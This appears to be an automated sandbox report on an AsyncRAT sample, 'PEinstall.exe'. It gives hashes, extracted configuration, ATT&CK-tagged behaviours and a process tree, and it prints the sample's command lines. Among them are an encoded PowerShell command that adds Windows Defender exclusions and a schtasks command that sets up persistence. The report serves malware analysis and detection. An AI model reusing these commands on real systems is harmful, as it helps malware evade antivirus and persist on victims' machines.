Analysis
-
max time kernel
139s -
max time network
108s -
platform
windows10-ltsc_2021_x64 -
resource
win10ltsc2021-20250314-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250314-enlocale:en-usos:windows10-ltsc_2021-x64system -
submitted
19/04/2025, 22:45
Static task
static1
1 signatures
Behavioral task
behavioral1
Sample
PEinstall.exe
Resource
win10ltsc2021-20250314-en
windows10-ltsc_2021-x64
18 signatures
150 seconds
General
-
Target
PEinstall.exe
-
Size
57KB
-
MD5
ea80d619808889ea8edb799056a67bc1
-
SHA1
de591d83c5e24498a294366205d0a12d2098385c
-
SHA256
2ebed6be66514b15e46f9b3afc93a20c9bbfb9aebba07128320b2e56c239e3d9
-
SHA512
d7e43ccd9a2f4f0d959d49ddc089a90da4e7e00cde0480c849d5078cf6127d5a15f4229067170399e6722a574b43f2121f9cbc8b34768b844583adacaff07929
-
SSDEEP
1536:KERi5rR21kXfc3dLnUAfUgc2vZnmHYUTmu1ycX9D:3RV6EpUgcTmu1ycX9D
Score
10/10
Malware Config
Extracted
Family
asyncrat
Version
0.5.8
Botnet
Default
C2
127.0.0.1:6606
127.0.0.1:7707
127.0.0.1:8808
127.0.0.1:2009
Mutex
jc1XWfeoz50P
Attributes
-
delay
10
-
install
true
-
install_file
executor.exe
-
install_folder
%Temp%
aes.plain
Signatures
-
Asyncrat family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral1/files/0x0008000000028206-36.dat family_asyncrat -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Control Panel\International\Geo\Nation PEinstall.exe Key value queried \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Control Panel\International\Geo\Nation PEInstaller.exe -
Executes dropped EXE 2 IoCs
pid Process 5628 PEInstaller.exe 4120 executor.exe -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language executor.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PEInstaller.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 taskmgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString taskmgr.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 3520 timeout.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1724 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 964 powershell.exe 964 powershell.exe 5704 powershell.exe 5704 powershell.exe 5628 PEInstaller.exe 5628 PEInstaller.exe 5628 PEInstaller.exe 5628 PEInstaller.exe 5628 PEInstaller.exe 5628 PEInstaller.exe 5628 PEInstaller.exe 5628 PEInstaller.exe 5628 PEInstaller.exe 5628 PEInstaller.exe 5628 PEInstaller.exe 5628 PEInstaller.exe 5628 PEInstaller.exe 5628 PEInstaller.exe 5628 PEInstaller.exe 5628 PEInstaller.exe 5628 PEInstaller.exe 5628 PEInstaller.exe 5628 PEInstaller.exe 5628 PEInstaller.exe 5628 PEInstaller.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 5884 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 29 IoCs
description pid Process Token: SeDebugPrivilege 964 powershell.exe Token: SeDebugPrivilege 5704 powershell.exe Token: SeIncreaseQuotaPrivilege 5704 powershell.exe Token: SeSecurityPrivilege 5704 powershell.exe Token: SeTakeOwnershipPrivilege 5704 powershell.exe Token: SeLoadDriverPrivilege 5704 powershell.exe Token: SeSystemProfilePrivilege 5704 powershell.exe Token: SeSystemtimePrivilege 5704 powershell.exe Token: SeProfSingleProcessPrivilege 5704 powershell.exe Token: SeIncBasePriorityPrivilege 5704 powershell.exe Token: SeCreatePagefilePrivilege 5704 powershell.exe Token: SeBackupPrivilege 5704 powershell.exe Token: SeRestorePrivilege 5704 powershell.exe Token: SeShutdownPrivilege 5704 powershell.exe Token: SeDebugPrivilege 5704 powershell.exe Token: SeSystemEnvironmentPrivilege 5704 powershell.exe Token: SeRemoteShutdownPrivilege 5704 powershell.exe Token: SeUndockPrivilege 5704 powershell.exe Token: SeManageVolumePrivilege 5704 powershell.exe Token: 33 5704 powershell.exe Token: 34 5704 powershell.exe Token: 35 5704 powershell.exe Token: 36 5704 powershell.exe Token: SeDebugPrivilege 5628 PEInstaller.exe Token: SeDebugPrivilege 4120 executor.exe Token: SeDebugPrivilege 4120 executor.exe Token: SeDebugPrivilege 5884 taskmgr.exe Token: SeSystemProfilePrivilege 5884 taskmgr.exe Token: SeCreateGlobalPrivilege 5884 taskmgr.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe 5884 taskmgr.exe -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 952 wrote to memory of 964 952 PEinstall.exe 82 PID 952 wrote to memory of 964 952 PEinstall.exe 82 PID 952 wrote to memory of 5704 952 PEinstall.exe 84 PID 952 wrote to memory of 5704 952 PEinstall.exe 84 PID 952 wrote to memory of 5628 952 PEinstall.exe 86 PID 952 wrote to memory of 5628 952 PEinstall.exe 86 PID 952 wrote to memory of 5628 952 PEinstall.exe 86 PID 5628 wrote to memory of 4496 5628 PEInstaller.exe 95 PID 5628 wrote to memory of 4496 5628 PEInstaller.exe 95 PID 5628 wrote to memory of 4496 5628 PEInstaller.exe 95 PID 5628 wrote to memory of 4252 5628 PEInstaller.exe 97 PID 5628 wrote to memory of 4252 5628 PEInstaller.exe 97 PID 5628 wrote to memory of 4252 5628 PEInstaller.exe 97 PID 4252 wrote to memory of 3520 4252 cmd.exe 99 PID 4252 wrote to memory of 3520 4252 cmd.exe 99 PID 4252 wrote to memory of 3520 4252 cmd.exe 99 PID 4496 wrote to memory of 1724 4496 cmd.exe 100 PID 4496 wrote to memory of 1724 4496 cmd.exe 100 PID 4496 wrote to memory of 1724 4496 cmd.exe 100 PID 4252 wrote to memory of 4120 4252 cmd.exe 101 PID 4252 wrote to memory of 4120 4252 cmd.exe 101 PID 4252 wrote to memory of 4120 4252 cmd.exe 101
Processes
-
C:\Users\Admin\AppData\Local\Temp\PEinstall.exe"C:\Users\Admin\AppData\Local\Temp\PEinstall.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:952 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcgBmACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHgAYwBxACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAVABoAGUAcgBlACAAdwBhAHMAIABhAG4AIABlAHIAcgBvAHIAIABlAHgAZQBjAHUAdABpAG4AZwAgAHQAaABpAHMAIABwAHIAbwBnAHIAYQBtAC4AIABDAG8AbgB0AGEAYwB0ACAAdABoAGUAIABhAHUAdABoAG8AcgAgAGYAbwByACAAbQBvAHIAZQAgAGkAbgBmAG8AcgBtAGEAdABpAG8AbgAuACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwB4AG0AYwAjAD4A"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:964
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbQBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAaQByACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAYQBzACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5704
-
-
C:\Users\Admin\AppData\Roaming\PEInstaller.exe"C:\Users\Admin\AppData\Roaming\PEInstaller.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5628 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "executor" /tr '"C:\Users\Admin\AppData\Local\Temp\executor.exe"' & exit3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4496 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "executor" /tr '"C:\Users\Admin\AppData\Local\Temp\executor.exe"'4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1724
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpA7D9.tmp.bat""3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4252 -
C:\Windows\SysWOW64\timeout.exetimeout 34⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:3520
-
-
C:\Users\Admin\AppData\Local\Temp\executor.exe"C:\Users\Admin\AppData\Local\Temp\executor.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4120
-
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5884
Network
MITRE ATT&CK Enterprise v16
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD53eb3833f769dd890afc295b977eab4b4
SHA1e857649b037939602c72ad003e5d3698695f436f
SHA256c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485
SHA512c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72
-
Filesize
1KB
MD592d8de91915c06ef75e47edc5511ed1c
SHA19be38cf8ff95bb34c0113d0779cb37b264c7c7ca
SHA25611393033e57c6f12c10cb3b9962c44a44462141be15b6d3f78a7d2c8944fa416
SHA512d0025b0dca6bb63e31a44edfa0eb18cecbc7cd43c23b817e1f8cd002b56ee8eb8715cb5ed016008faf49420c445733ad1e4124bf2081b9dc05056881d7be6a5a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
155B
MD56e6fd9264e5dc1379a1a8cca23e4f35d
SHA11861722927cefb3fa929665f9cac7d86ea3d9f7d
SHA256e2a324298728d71f7bad805599624fd65274e18c7f25ea2550e29877a09cdd7b
SHA5123c83e39201110d4b45c93f263c363acd95b7ac34acf928aa9c2f8201211fb0383a385cae519093e1293e688f184698ba18a00445689f534451b2b2d9616516d4
-
Filesize
48KB
MD5a96ef57452d73871dc1045b96fddcf96
SHA17a9b28306b0fc32d4281b756be5bc91f53234696
SHA2562fd4684b115a4b607493596b7fba4d54ddc7d97aec1852fbd60d449f353c2902
SHA51214db2977907baa98fe81f66fc0b44d360bee92d8b5e53527021fd9ef5f182e3aaa30e5e05ef95b0eac3d09b21074e89dee42c59d8a23b91a3dfa0c4871c3cd8e